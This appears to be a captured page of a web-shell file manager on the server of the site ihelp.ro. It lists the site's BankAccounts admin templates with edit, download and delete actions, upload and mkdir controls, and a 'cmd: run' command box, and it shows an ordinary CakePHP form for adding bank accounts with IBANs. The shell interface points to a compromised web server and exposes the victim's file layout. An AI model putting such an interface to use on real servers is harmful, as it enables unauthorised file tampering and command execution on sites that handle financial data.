/
var
/
www
/
vhosts
/
ihelp.ro
/
httpdocs
/
templates
/
Admin
/
BankAccounts
/
/var/www/vhosts/ihelp.ro/httpdocs/templates/Admin/BankAccounts
mkdir
upload
Name
Size
Mode
Actions
add.php
1547
0644
edit
dl
rm
edit.php
1559
0644
edit
dl
rm
index.php
3297
0644
edit
dl
rm
Edit:
/var/www/vhosts/ihelp.ro/httpdocs/templates/Admin/BankAccounts/add.php
(1547B)
<!-- Content Header (Page header) --> <section class="content-header"> <div class="container-fluid"> <div class="row mb-2"> <div class="col-lg-12"> <h1 class="float-left"><?php echo __('Bank Account'); ?></h1> <ol class="breadcrumb float-right"> <li class="breadcrumb-item active" aria-current="page"> <a class="" href="<?php echo $this->Url->build(['action' => 'index']); ?>"><i class="fas fa-home"></i> <?php echo __('Home'); ?></a></li> </ol> </div> </div> </div><!-- /.container-fluid --> </section> <!-- Main content --> <section class="content"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <?php echo $this->Form->create($bankAccount, ['role' => 'form', 'novalidate' => true]); ?> <?php echo $this->Form->control('cause_id', ['empty' => __('Select Cause')]); echo $this->Form->control('account_type_id', ['options' => $bankAccountType,'empty' => __('Select Account Type')]); echo $this->Form->control('bank_contact_name', ['label' => 'Titular cont']); echo $this->Form->control('bank_name'); echo $this->Form->control('bank_iban'); echo $this->Form->control('is_active'); ?> <?php echo $this->Form->submit(__('Submit')); ?> <?php echo $this->Form->end(); ?> </div> </div> </div> </div> </div> <!-- /.row --> </section>
Save
cmd:
run